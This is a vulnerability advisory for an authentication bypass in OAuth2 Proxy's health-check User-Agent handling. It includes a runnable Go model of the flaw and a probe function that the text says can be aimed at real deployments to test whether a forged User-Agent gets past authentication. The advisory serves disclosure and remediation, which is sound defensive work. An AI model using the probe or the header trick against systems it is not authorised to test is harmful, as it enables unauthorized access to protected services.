EXECUTIVE SUMMARY:
CVE-2026-34457, with a CVSS score of 9.1, is a critical vulnerability in OAuth2 Proxy, a reverse proxy that provides authentication using OAuth2 providers. The affected packages are go/github.com/oauth2-proxy/oauth2-proxy/v7 in versions prior to 7.15.2 and the legacy go/github.com/oauth2-proxy/oauth2-proxy module in versions up to and including 3.2.0. The issue is a configuration-dependent authentication bypass: it applies only to deployments that use OAuth2 Proxy through an auth_request-style integration, such as nginx auth_request, and that either set --ping-user-agent or enable --gcp-healthchecks. In that integration nginx forwards the client's headers, including User-Agent, to the OAuth2 Proxy auth endpoint in a subrequest and lets the original request through on any 2xx response. Because a request carrying the configured health-check User-Agent value receives the health-check response (a 2xx) before the session is ever checked, an attacker with network access who sends such a request is treated as authenticated and reaches protected upstream resources without completing the normal login flow. The impact is unauthorized access to whatever the proxy guards, which can lead to data exposure, unauthorized modification, or disruption of the services behind it. Exploitation requires only that the target uses an auth_request-style integration with one of the two options above and that the attacker knows or can guess the configured User-Agent value; the GCP health-check agent string is a fixed, publicly documented value, and no credentials are needed.
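The ordering the advisory describes, together with a probe that can be pointed at a deployment, as an added example: this models the behaviour and is not oauth2-proxy's own handler code. The User-Agent value health-check/1.0, the cookie name _oauth2_proxy and the session value "valid-session" are constructed for the illustration, and the two in-process servers are built with httptest so the example runs offline.

```go
package main

import (
	"fmt"
	"log"
	"net/http"
	"net/http/httptest"
)

// newAuthEndpoint models an auth_request endpoint. It is a simplified stand-in,
// not oauth2-proxy's handler chain: a health-check middleware that answers
// 200 OK sits in front of the session check. With shortcutAnyPath=true the
// User-Agent match fires on every path (the ordering this advisory is about);
// with false it is honoured only on the dedicated ping path.
func newAuthEndpoint(pingUA string, shortcutAnyPath bool) http.Handler {
	sessionCheck := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		// Stand-in for the real session lookup: a constructed cookie value passes.
		if c, err := r.Cookie("_oauth2_proxy"); err == nil && c.Value == "valid-session" {
			w.WriteHeader(http.StatusAccepted) // what a successful auth subrequest returns
			return
		}
		w.WriteHeader(http.StatusUnauthorized)
	})
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		onPingPath := r.URL.Path == "/ping"
		uaMatches := pingUA != "" && r.UserAgent() == pingUA
		if onPingPath || (uaMatches && shortcutAnyPath) {
			w.WriteHeader(http.StatusOK)
			_, _ = w.Write([]byte("OK"))
			return
		}
		sessionCheck.ServeHTTP(w, r)
	})
}

// nginxAllows applies auth_request semantics: any 2xx lets the original
// request through to the upstream; 401 and 403 deny it.
func nginxAllows(status int) bool { return status >= 200 && status < 300 }

// ProbeAuthRequest issues the two subrequests nginx would make for an
// anonymous client: one with a neutral User-Agent, one with the health-check
// value. It returns true when the User-Agent alone flips deny to allow.
func ProbeAuthRequest(authURL, healthUA string) (bool, error) {
	statusWith := func(ua string) (int, error) {
		req, err := http.NewRequest(http.MethodGet, authURL, nil)
		if err != nil {
			return 0, err
		}
		req.Header.Set("User-Agent", ua)
		resp, err := http.DefaultClient.Do(req)
		if err != nil {
			return 0, err
		}
		resp.Body.Close()
		return resp.StatusCode, nil
	}
	anon, err := statusWith("probe/1.0")
	if err != nil {
		return false, err
	}
	withUA, err := statusWith(healthUA)
	if err != nil {
		return false, err
	}
	return !nginxAllows(anon) && nginxAllows(withUA), nil
}

func main() {
	const ua = "health-check/1.0" // assumed --ping-user-agent value
	for _, shortcut := range []bool{true, false} {
		srv := httptest.NewServer(newAuthEndpoint(ua, shortcut))
		bypass, err := ProbeAuthRequest(srv.URL+"/oauth2/auth", ua)
		srv.Close()
		if err != nil {
			log.Fatal(err)
		}
		fmt.Printf("UA shortcut on every path=%v -> bypass=%v\n", shortcut, bypass)
	}
}
```

Against a real deployment, point ProbeAuthRequest at the URL nginx uses for its auth subrequest (for example the proxy's /oauth2/auth endpoint, if it is reachable from where you test) and pass the User-Agent value actually configured with --ping-user-agent, or the GCP health-check agent string when --gcp-healthchecks is on. A true result means an unauthenticated request with that header would be allowed through.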
RECOMMENDATION:
We recommend updating the go/github.com/oauth2-proxy/oauth2-proxy/v7 module to version 7.15.2 or later. The advisory lists no fixed release for the legacy go/github.com/oauth2-proxy/oauth2-proxy module (affected up to and including 3.2.0), so deployments still on it should move to the patched v7 line. Until the upgrade is in place, the conditions the advisory names can be removed directly: unset --ping-user-agent and disable --gcp-healthchecks in auth_request-style deployments, and have load balancers probe the dedicated ping path instead of relying on a User-Agent match. Details: https://github.com/advisories/GHSA-5hvv-m4w4-gf6v
REFERENCES:
The following reports contain further technical details:
https://github.com/advisories/GHSA-5hvv-m4w4-gf6v